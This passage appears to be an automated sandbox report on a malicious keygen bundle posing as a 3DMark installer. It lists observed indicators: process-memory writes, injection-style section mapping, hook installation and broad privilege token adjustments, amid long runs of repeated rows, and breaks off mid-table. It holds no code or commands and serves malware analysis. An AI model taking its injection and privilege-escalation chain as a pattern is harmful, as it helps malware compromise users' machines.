Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4664 571A.exe 4664 571A.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4692 5806.exe 4692 5806.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 5052 571A.exe 5052 571A.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4692 5806.exe 4692 5806.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4808 8072.exe 4808 8072.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4692 5806.exe 4692 5806.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 1380 5.exe 1380 5.exe 1380 5.exe 1380 5.exe 1380 5.exe 1380 5.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 4756 jfiag3g_gg.exe 4756 jfiag3g_gg.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 1060 76AD.exe 1060 76AD.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 3796 MicrosoftEdgeCP.exe 3796 MicrosoftEdgeCP.exe 184 seed.exe 4808 8072.exe 4124 94D7.exe -
Suspicious use of AdjustPrivilegeToken 169 IoCs
description pid Process Token: SeManageVolumePrivilege 3740 jg2_2qua.exe Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 2368 msiexec.exe Token: SeCreateTokenPrivilege 4064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4064 msiexec.exe Token: SeLockMemoryPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeMachineAccountPrivilege 4064 msiexec.exe Token: SeTcbPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeLoadDriverPrivilege 4064 msiexec.exe Token: SeSystemProfilePrivilege 4064 msiexec.exe Token: SeSystemtimePrivilege 4064 msiexec.exe Token: SeProfSingleProcessPrivilege 4064 msiexec.exe Token: SeIncBasePriorityPrivilege 4064 msiexec.exe Token: SeCreatePagefilePrivilege 4064 msiexec.exe Token: SeCreatePermanentPrivilege 4064 msiexec.exe Token: SeBackupPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeDebugPrivilege 4064 msiexec.exe Token: SeAuditPrivilege 4064 msiexec.exe Token: SeSystemEnvironmentPrivilege 4064 msiexec.exe Token: SeChangeNotifyPrivilege 4064 msiexec.exe Token: SeRemoteShutdownPrivilege 4064 msiexec.exe Token: SeUndockPrivilege 4064 msiexec.exe Token: SeSyncAgentPrivilege 4064 msiexec.exe Token: SeEnableDelegationPrivilege 4064 msiexec.exe Token: SeManageVolumePrivilege 4064 msiexec.exe Token: SeImpersonatePrivilege 4064 msiexec.exe Token: SeCreateGlobalPrivilege 4064 msiexec.exe Token: SeCreateTokenPrivilege 4064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4064 msiexec.exe Token: SeLockMemoryPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeMachineAccountPrivilege 4064 msiexec.exe Token: SeTcbPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeLoadDriverPrivilege 4064 msiexec.exe Token: SeSystemProfilePrivilege 4064 msiexec.exe Token: SeSystemtimePrivilege 4064 msiexec.exe Token: SeProfSingleProcessPrivilege 4064 msiexec.exe Token: SeIncBasePriorityPrivilege 4064 msiexec.exe Token: SeCreatePagefilePrivilege 4064 msiexec.exe Token: SeCreatePermanentPrivilege 4064 msiexec.exe Token: SeBackupPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeDebugPrivilege 4064 msiexec.exe Token: SeAuditPrivilege 4064 msiexec.exe Token: SeSystemEnvironmentPrivilege 4064 msiexec.exe Token: SeChangeNotifyPrivilege 4064 msiexec.exe Token: SeRemoteShutdownPrivilege 4064 msiexec.exe Token: SeUndockPrivilege 4064 msiexec.exe Token: SeSyncAgentPrivilege 4064 msiexec.exe Token: SeEnableDelegationPrivilege 4064 msiexec.exe Token: SeManageVolumePrivilege 4064 msiexec.exe Token: SeImpersonatePrivilege 4064 msiexec.exe Token: SeCreateGlobalPrivilege 4064 msiexec.exe Token: SeCreateTokenPrivilege 4064 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4064 msiexec.exe Token: SeLockMemoryPrivilege 4064 msiexec.exe Token: SeIncreaseQuotaPrivilege 4064 msiexec.exe Token: SeMachineAccountPrivilege 4064 msiexec.exe Token: SeTcbPrivilege 4064 msiexec.exe Token: SeSecurityPrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeLoadDriverPrivilege 4064 msiexec.exe Token: SeSystemProfilePrivilege 4064 msiexec.exe Token: SeSystemtimePrivilege 4064 msiexec.exe Token: SeProfSingleProcessPrivilege 4064 msiexec.exe Token: SeIncBasePriorityPrivilege 4064 msiexec.exe Token: SeCreatePagefilePrivilege 4064 msiexec.exe Token: SeCreatePermanentPrivilege 4064 msiexec.exe Token: SeBackupPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeShutdownPrivilege 4064 msiexec.exe Token: SeDebugPrivilege 4064 msiexec.exe Token: SeAuditPrivilege 4064 msiexec.exe Token: SeSystemEnvironmentPrivilege 4064 msiexec.exe Token: SeChangeNotifyPrivilege 4064 msiexec.exe Token: SeRemoteShutdownPrivilege 4064 msiexec.exe Token: SeUndockPrivilege 4064 msiexec.exe Token: SeSyncAgentPrivilege 4064 msiexec.exe Token: SeEnableDelegationPrivilege 4064 msiexec.exe Token: SeManageVolumePrivilege 4064 msiexec.exe Token: SeImpersonatePrivilege 4064 msiexec.exe Token: SeCreateGlobalPrivilege 4064 msiexec.exe Token: SeManageVolumePrivilege 3740 jg2_2qua.exe Token: SeDebugPrivilege 3164 taskkill.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeManageVolumePrivilege 1928 MiniThunderPlatform.exe Token: SeDebugPrivilege 1972 MicrosoftEdge.exe Token: SeDebugPrivilege 1972 MicrosoftEdge.exe Token: SeDebugPrivilege 1972 MicrosoftEdge.exe Token: SeDebugPrivilege 1972 MicrosoftEdge.exe Token: SeDebugPrivilege 808 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 808 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 808 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 808 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3828 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3828 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeManageVolumePrivilege 5104 8B60.exe Token: SeDebugPrivilege 1060 76AD.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeDebugPrivilege 4884 taskkill.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeManageVolumePrivilege 5104 8B60.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeDebugPrivilege 4220 taskkill.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeDebugPrivilege 2008 taskkill.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4064 msiexec.exe 1116 1021C014A4C9A552.tmp -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 4028 keygen-step-2.exe 208 002.exe 208 002.exe 1492 Setup.exe 3656 setup.exe 748 aliens.exe 424 1A27AE19C9E414DC.exe 1108 1A27AE19C9E414DC.exe 1712 firefox.exe 3532 1605887554245.exe 808 firefox.exe 3808 1605887560120.exe 3768 firefox.exe 248 1605887565839.exe 3020 firefox.exe 1356 1605887569464.exe 3744 ThunderFW.exe 1928 MiniThunderPlatform.exe 3152 1021C014A4C9A552.exe 1116 1021C014A4C9A552.tmp 2620 seed.sfx.exe 1972 MicrosoftEdge.exe 3796 MicrosoftEdgeCP.exe 3796 MicrosoftEdgeCP.exe 4876 6D17.exe 4876 6D17.exe -
Suspicious use of WriteProcessMemory 295 IoCs
description pid Process procid_target PID 644 wrote to memory of 3648 644 3DMark 11 Advanced Edition.exe 78 PID 644 wrote to memory of 3648 644 3DMark 11 Advanced Edition.exe 78 PID 644 wrote to memory of 3648 644 3DMark 11 Advanced Edition.exe 78 PID 3648 wrote to memory of 3128 3648 cmd.exe 81 PID 3648 wrote to memory of 3128 3648 cmd.exe 81 PID 3648 wrote to memory of 3128 3648 cmd.exe 81 PID 3648 wrote to memory of 3800 3648 cmd.exe 82 PID 3648 wrote to memory of 3800 3648 cmd.exe 82 PID 3648 wrote to memory of 3800 3648 cmd.exe 82 PID 3648 wrote to memory of 2436 3648 cmd.exe 83 PID 3648 wrote to memory of 2436 3648 cmd.exe 83 PID 3648 wrote to memory of 2436 3648 cmd.exe 83 PID 3648 wrote to memory of 4028 3648 cmd.exe 84 PID 3648 wrote to memory of 4028 3648 cmd.exe 84 PID 3648 wrote to memory of 4028 3648 cmd.exe 84 PID 3648 wrote to memory of 3012 3648 cmd.exe 85 PID 3648 wrote to memory of 3012 3648 cmd.exe 85 PID 3648 wrote to memory of 3012 3648 cmd.exe 85 PID 3012 wrote to memory of 3920 3012 keygen-step-3.exe 86 PID 3012 wrote to memory of 3920 3012 keygen-step-3.exe 86 PID 3012 wrote to memory of 3920 3012 keygen-step-3.exe 86 PID 3648 wrote to memory of 2856 3648 cmd.exe 87 PID 3648 wrote to memory of 2856 3648 cmd.exe 87 PID 3648 wrote to memory of 2856 3648 cmd.exe 87 PID 3920 wrote to memory of 2192 3920 cmd.exe 89 PID 3920 wrote to memory of 2192 3920 cmd.exe 89 PID 3920 wrote to memory of 2192 3920 cmd.exe 89 PID 3800 wrote to memory of 408 3800 keygen-pr.exe 90 PID 3800 wrote to memory of 408 3800 keygen-pr.exe 90 PID 3800 wrote to memory of 408 3800 keygen-pr.exe 90 PID 2856 wrote to memory of 208 2856 keygen-step-4.exe 91 PID 2856 wrote to memory of 208 2856 keygen-step-4.exe 91 PID 2856 wrote to memory of 208 2856 keygen-step-4.exe 91 PID 408 wrote to memory of 2080 408 key.exe 92 PID 408 wrote to memory of 2080 408 key.exe 92 PID 408 wrote to memory of 2080 408 key.exe 92 PID 2856 wrote to memory of 1492 2856 keygen-step-4.exe 93 PID 2856 wrote to memory of 1492 2856 keygen-step-4.exe 93 PID 2856 wrote to memory of 1492 2856 keygen-step-4.exe 93 PID 4028 wrote to memory of 1984 4028 keygen-step-2.exe 94 PID 4028 wrote to memory of 1984 4028 keygen-step-2.exe 94 PID 4028 wrote to memory of 1984 4028 keygen-step-2.exe 94 PID 1984 wrote to memory of 3600 1984 cmd.exe 96 PID 1984 wrote to memory of 3600 1984 cmd.exe 96 PID 1984 wrote to memory of 3600 1984 cmd.exe 96 PID 1492 wrote to memory of 3656 1492 Setup.exe 97 PID 1492 wrote to memory of 3656 1492 Setup.exe 97 PID 1492 wrote to memory of 3656 1492 Setup.exe 97 PID 3656 wrote to memory of 748 3656 setup.exe 98 PID 3656 wrote to memory of 748 3656 setup.exe 98 PID 3656 wrote to memory of 748 3656 setup.exe 98 PID 2856 wrote to memory of 3740 2856 keygen-step-4.exe 99 PID 2856 wrote to memory of 3740 2856 keygen-step-4.exe 99 PID 2856 wrote to memory of 3740 2856 keygen-step-4.exe 99 PID 748 wrote to memory of 4064 748 aliens.exe 100 PID 748 wrote to memory of 4064 748 aliens.exe 100 PID 748 wrote to memory of 4064 748 aliens.exe 100 PID 748 wrote to memory of 424 748 aliens.exe 102 PID 748 wrote to memory of 424 748 aliens.exe 102 PID 748 wrote to memory of 424 748 aliens.exe 102 PID 2368 wrote to memory of 1976 2368 msiexec.exe 103 PID 2368 wrote to memory of 1976 2368 msiexec.exe 103 PID 2368 wrote to memory of 1976 2368 msiexec.exe 103 PID 748 wrote to memory of 1108 748 aliens.exe 104 PID 748 wrote to memory of 1108 748 aliens.exe 104 PID 748 wrote to memory of 1108 748 aliens.exe 104 PID 748 wrote to memory of 1272 748 aliens.exe 105 PID 748 wrote to memory of 1272 748 aliens.exe 105 PID 748 wrote to memory of 1272 748 aliens.exe 105 PID 1272 wrote to memory of 2156 1272 cmd.exe 107 PID 1272 wrote to memory of 2156 1272 cmd.exe 107 PID 1272 wrote to memory of 2156 1272 cmd.exe 107 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 wrote to memory of 1712 424 1A27AE19C9E414DC.exe 108 PID 1108 wrote to memory of 3792 1108 1A27AE19C9E414DC.exe 109 PID 1108 wrote to memory of 3792 1108 1A27AE19C9E414DC.exe 109 PID 1108 wrote to memory of 3792 1108 1A27AE19C9E414DC.exe 109 PID 3792 wrote to memory of 3164 3792 cmd.exe 111 PID 3792 wrote to memory of 3164 3792 cmd.exe 111 PID 3792 wrote to memory of 3164 3792 cmd.exe 111 PID 424 wrote to memory of 3532 